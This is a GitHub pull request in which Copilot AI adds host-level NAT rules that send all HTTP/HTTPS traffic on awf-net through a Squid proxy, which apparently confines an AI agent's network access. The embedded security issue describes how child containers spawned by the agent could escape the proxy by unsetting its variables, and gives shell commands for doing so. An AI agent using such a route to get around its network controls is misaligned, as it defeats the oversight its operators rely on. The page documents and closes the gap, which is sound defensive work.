Contributor

Copilot AI commented Jan 18, 2026

NAT rules that redirect HTTP/HTTPS traffic to Squid only existed inside the agent container. Any other container on awf-net that ignored HTTP_PROXY would have traffic blocked but not proxied.

Changes

  • New FW_WRAPPER_NAT chain in host's nat table PREROUTING
    • DNAT rules redirect ports 80/443 to Squid for all traffic from fw-bridge
    • RETURN rules for traffic from/to Squid IP to prevent redirect loops
  • Cleanup logic updated in cleanupHostIptables() to remove NAT chain on shutdown
  • Unit tests added for NAT chain creation and cleanup

Traffic flow after this change

Container on awf-net
    ↓
Host PREROUTING → FW_WRAPPER_NAT → DNAT to Squid:3128
    ↓
Squid (domain ACL filtering)

All containers on awf-net now have HTTP/HTTPS transparently proxied regardless of whether they respect HTTP_PROXY environment variables.

Original prompt

This section details the original issue you should resolve

<issue_title>[Security] Child containers don't inherit NAT rules - proxy bypass possible</issue_title>
<issue_description>
Priority

P1 - High

Summary

NAT rules that redirect HTTP/HTTPS traffic to Squid only apply to the agent container. When the agent spawns child containers (e.g., for MCP servers), these containers do NOT have the same NAT rules. They rely solely on:

  1. HTTP_PROXY environment variables (can be ignored by applications)
  2. Host iptables default deny (blocks unknown IPs, but doesn't force proxy)

Current Behavior

Agent container has NAT rules:

iptables -t nat -A OUTPUT -p tcp --dport 80 -j DNAT --to-destination 172.30.0.10:3128
iptables -t nat -A OUTPUT -p tcp --dport 443 -j DNAT --to-destination 172.30.0.10:3128

Spawned child containers do NOT have these rules:

# In agent container (works - NAT redirects to Squid)
curl https://blocked.com  # → Squid → denied

# In spawned container (bypasses NAT if ignores HTTP_PROXY)
docker run alpine curl https://blocked.com  # → May succeed if host iptables allows

Attack Vector

# Spawn container that ignores proxy environment variables
docker run --rm alpine sh -c '
  unset HTTP_PROXY HTTPS_PROXY http_proxy https_proxy
  wget https://evil.com  # No NAT redirect in this container
'

Current Mitigations

  1. docker-wrapper.sh injects --network awf-net and proxy env vars
  2. Host iptables has default deny for non-Squid traffic

Why This is Insufficient

  • Applications can ignore HTTP_PROXY environment variables
  • Some tools (e.g., wget --no-proxy) explicitly bypass proxy
  • Library code may not respect proxy settings
  • Container may install tools that don't use env vars

Proposed Solutions

Option A: Inject NAT setup into child containers

Modify docker-wrapper.sh to:

  1. Add --cap-add NET_ADMIN to all spawned containers
  2. Inject iptables setup script as entrypoint prefix

# In docker-wrapper.sh
INIT_SCRIPT="iptables -t nat -A OUTPUT -p tcp --dport 80 -j DNAT --to-destination 172.30.0.10:3128 && \
             iptables -t nat -A OUTPUT -p tcp --dport 443 -j DNAT --to-destination 172.30.0.10:3128"

DOCKER_ARGS="$DOCKER_ARGS --cap-add NET_ADMIN"
DOCKER_ARGS="$DOCKER_ARGS --entrypoint sh"
# Prepend NAT setup to original entrypoint: sh applies INIT_SCRIPT, then execs the
# original command ("$IMAGE" and "$@" stand for the image and command the wrapper captured)
docker run $DOCKER_ARGS "$IMAGE" -c "$INIT_SCRIPT && exec \"\$@\"" sh "$@"

Option B: Shared network namespace

  1. Create a network namespace with NAT rules
  2. All child containers share this namespace
  3. NAT rules apply to all traffic in the namespace

Option C: Transparent proxy mode

Configure Squid as a transparent proxy with host-level traffic interception for all containers in awf-net.

Files to Modify

  • containers/agent/docker-wrapper.sh:82-92 - Network injection logic
  • src/docker-manager.ts - Container configuration
  • Potentially: Host-level iptables for transparent proxy

Verification Test

sudo awf --allow-domains github.com -- /bin/bash -c '
  echo "--- Child container NAT rules ---"
  docker run --rm --network awf-net --cap-add NET_ADMIN \
    alpine sh -c "apk add -q iptables && iptables -t nat -L -n 2>/dev/null | grep DNAT || echo \"No NAT rules\""
'
# The fallback message is \"-escaped: a bare '...' would end the outer single-quoted bash script early.
# Expected: "No NAT rules" (current behavior - the gap)

Related

Comments on the Issue (you are @copilot in this section)
Co-authored-by: Mossaka <5447827+Mossaka@users.noreply.github.com>
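The FW_WRAPPER_NAT chain the description above outlines, written out as an added shell example (not the project's own src/host-iptables.ts code); the bridge name fw-bridge and the Squid address 172.30.0.10:3128 are taken from the issue text and are assumptions about the deployment:

```shell
# Added example, not the project's own host-iptables.ts code: the host-side
# FW_WRAPPER_NAT chain the PR describes, as a setup/cleanup pair. Assumed values
# (from the issue text): bridge fw-bridge, Squid at 172.30.0.10:3128.
BRIDGE="${AWF_BRIDGE:-fw-bridge}"
SQUID_IP="${AWF_SQUID_IP:-172.30.0.10}"
SQUID_PORT="${AWF_SQUID_PORT:-3128}"
CHAIN="FW_WRAPPER_NAT"

# Rules in apply order. RETURN rules come first so Squid's own upstream
# connections and replies addressed to Squid are never redirected again (the
# loop the PR guards against); other bridge traffic to 80/443 is DNAT'd.
nat_rules() {
  cat <<EOF
-t nat -N $CHAIN
-t nat -A $CHAIN -s $SQUID_IP -j RETURN
-t nat -A $CHAIN -d $SQUID_IP -j RETURN
-t nat -A $CHAIN -p tcp --dport 80 -j DNAT --to-destination $SQUID_IP:$SQUID_PORT
-t nat -A $CHAIN -p tcp --dport 443 -j DNAT --to-destination $SQUID_IP:$SQUID_PORT
-t nat -I PREROUTING 1 -i $BRIDGE -j $CHAIN
EOF
}

# Undo in reverse: remove the jump, flush, then delete the chain.
nat_cleanup_rules() {
  cat <<EOF
-t nat -D PREROUTING -i $BRIDGE -j $CHAIN
-t nat -F $CHAIN
-t nat -X $CHAIN
EOF
}

# $1 receives each rule as arguments (default iptables; pass "echo" to dry-run).
# Cleanup runs first so re-running setup never duplicates rules.
setup_nat() {
  ipt="${1:-iptables}"
  nat_cleanup_rules | while IFS= read -r r; do $ipt $r 2>/dev/null || true; done
  nat_rules | while IFS= read -r r; do $ipt $r || return 1; done
}

cleanup_nat() {
  ipt="${1:-iptables}"
  nat_cleanup_rules | while IFS= read -r r; do $ipt $r; done
}

# Squid's replies to the container are bridged, never routed, so conntrack can
# undo the DNAT on them only if bridged frames pass through iptables (Docker sets this).
bridge_nf_enabled() {
  [ "$(sysctl -n net.bridge.bridge-nf-call-iptables 2>/dev/null)" = "1" ]
}
```

Run `setup_nat echo` to review the exact rule set before applying it as root, and check `bridge_nf_enabled` on the host: if it fails, the redirected connections stall because Squid's replies are never un-DNAT'd.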
Copilot AI changed the title [WIP] Fix NAT rules to apply for child containers fix: add host-level NAT rules to redirect HTTP/HTTPS traffic for all containers on awf-net Jan 18, 2026
Copilot AI requested a review from Mossaka January 18, 2026 01:52
@Mossaka Mossaka marked this pull request as ready for review January 18, 2026 21:25
@github-actions

⚠️ Coverage Regression Detected

This PR decreases test coverage. Please add tests to maintain coverage levels.

Overall Coverage

Metric       Base     PR       Delta
Lines        77.88%   77.53%   -0.35%
Statements   77.94%   77.59%   -0.35%
Functions    77.29%   77.41%   +0.12%
Branches     71.00%   70.44%   -0.56%

Per-file Coverage Changes (1 file)

File                   Lines (Before -> After)     Statements (Before -> After)
src/host-iptables.ts   79.3% -> 76.4% (-2.83%)     79.5% -> 76.6% (-2.85%)

Coverage comparison generated by scripts/ci/compare-coverage.ts
